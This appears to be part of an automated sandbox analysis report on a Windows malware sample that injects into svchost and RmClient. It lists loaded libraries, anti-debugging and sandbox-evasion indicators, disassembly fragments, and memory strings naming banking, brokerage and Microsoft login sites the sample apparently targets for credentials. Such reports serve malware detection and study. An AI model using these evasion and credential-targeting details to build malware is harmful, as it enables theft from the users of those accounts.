            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: enkJ6J7dAn.exeStatic file information: File size 1402195 > 1048576
            Source: Binary string: RmClient.pdbGCTL source: svchost.exe, 00000002.00000002.2374917499.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374956046.0000000003019000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589350365.0000000000998000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: avmjQSNkeFbUoa.exe, 00000003.00000000.2259492562.000000000040E000.00000002.00000001.01000000.00000004.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442142227.000000000040E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: enkJ6J7dAn.exe, 00000000.00000003.2141666109.0000000004680000.00000004.00001000.00020000.00000000.sdmp, enkJ6J7dAn.exe, 00000000.00000003.2141537980.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2241727497.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243530836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2377156797.0000000002C42000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2374869041.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: enkJ6J7dAn.exe, 00000000.00000003.2141666109.0000000004680000.00000004.00001000.00020000.00000000.sdmp, enkJ6J7dAn.exe, 00000000.00000003.2141537980.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2241727497.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243530836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, RmClient.exe, 00000005.00000003.2377156797.0000000002C42000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2374869041.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RmClient.exe, 00000005.00000002.4591201110.000000000341C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.000000000096D000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442714328.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2664524956.00000000006DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RmClient.exe, 00000005.00000002.4591201110.000000000341C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.000000000096D000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442714328.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2664524956.00000000006DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: RmClient.pdb source: svchost.exe, 00000002.00000002.2374917499.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374956046.0000000003019000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589350365.0000000000998000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: enkJ6J7dAn.exeStatic PE information: real checksum: 0xa961f should be: 0x15e23b
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004033B0 push eax; ret 2_2_004033B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004234C3 push edi; retf 2_2_004234CE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401724 push 0000007Ch; iretd 2_2_00401726
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360225F pushad ; ret 2_2_036027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036027FA pushad ; ret 2_2_036027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx2_2_036309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360283D push eax; iretd 2_2_03602858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360135F push eax; iretd 2_2_03601369
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeCode function: 3_2_029ED49C push ds; retf 3_2_029ED4B0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02DF225F pushad ; ret 5_2_02DF27F9
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02DF27FA pushad ; ret 5_2_02DF27F9
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02DF283D push eax; iretd 5_2_02DF2858
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E209AD push ecx; mov dword ptr [esp], ecx5_2_02E209B6
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02DF1368 push eax; iretd 5_2_02DF1369
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_006A0110 push edi; retf 5_2_006A011B
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_00692260 push ds; retf 5_2_00692274
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_006A0365 push ebp; ret 5_2_006A0367
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_006A038C push ecx; iretd 5_2_006A038F
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_00697338 push ds; ret 5_2_0069733C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_0069B602 pushfd ; ret 5_2_0069B604
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CEC308 push cs; ret 5_2_02CEC309
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CF5052 push eax; ret 5_2_02CF5054
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CEF06A push ebp; iretd 5_2_02CEF072
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CE56F8 pushad ; iretd 5_2_02CE573F
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CE25EE push ebp; ret 5_2_02CE25EF
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CE857A push es; retf 5_2_02CE8584
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CEBFE5 push cs; retf 5_2_02CEBFEF
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CE4C7E push 00000021h; retf 5_2_02CE4C80
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeAPI/Special instruction interceptor: Address: 420A26C
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
            Source: C:\Windows\SysWOW64\RmClient.exeWindow / User API: threadDelayed 9816Jump to behavior
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87533
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeAPI coverage: 3.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\RmClient.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 5324Thread sleep count: 157 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 5324Thread sleep time: -314000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 5324Thread sleep count: 9816 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exe TID: 5324Thread sleep time: -19632000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe TID: 5628Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe TID: 5628Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe TID: 5628Thread sleep time: -54000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe TID: 5628Thread sleep count: 41 > 30Jump to behavior
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe TID: 5628Thread sleep time: -41000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\RmClient.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_0069C280 FindFirstFileW,FindNextFileW,FindClose,5_2_0069C280
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: 661035W.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 661035W.5.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 661035W.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 661035W.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 661035W.5.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 661035W.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 661035W.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 661035W.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 661035W.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: RmClient.exe, 00000005.00000002.4588947900.000000000096D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
            Source: 661035W.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 661035W.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 661035W.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 661035W.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 661035W.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 661035W.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: firefox.exe, 00000008.00000002.2665973894.000002AC8059C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 661035W.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 661035W.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 661035W.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 661035W.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 661035W.5.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 661035W.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: avmjQSNkeFbUoa.exe, 00000006.00000002.4589578770.000000000152F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
            Source: 661035W.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 661035W.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 661035W.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 661035W.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 661035W.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 661035W.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 661035W.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 661035W.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 661035W.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 661035W.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeAPI call chain: ExitProcess graph end nodegraph_0-86663
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\RmClient.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417583 LdrLoadDll,2_2_00417583
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0420A4D8 mov eax, dword ptr fs:[00000030h]0_2_0420A4D8
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0420A538 mov eax, dword ptr fs:[00000030h]0_2_0420A538
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_04208E88 mov eax, dword ptr fs:[00000030h]0_2_04208E88
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D437C mov eax, dword ptr fs:[00000030h]2_2_036D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h]2_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h]2_2_036D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370634F mov eax, dword ptr fs:[00000030h]2_2_0370634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h]2_2_0362C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h]2_2_03650310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
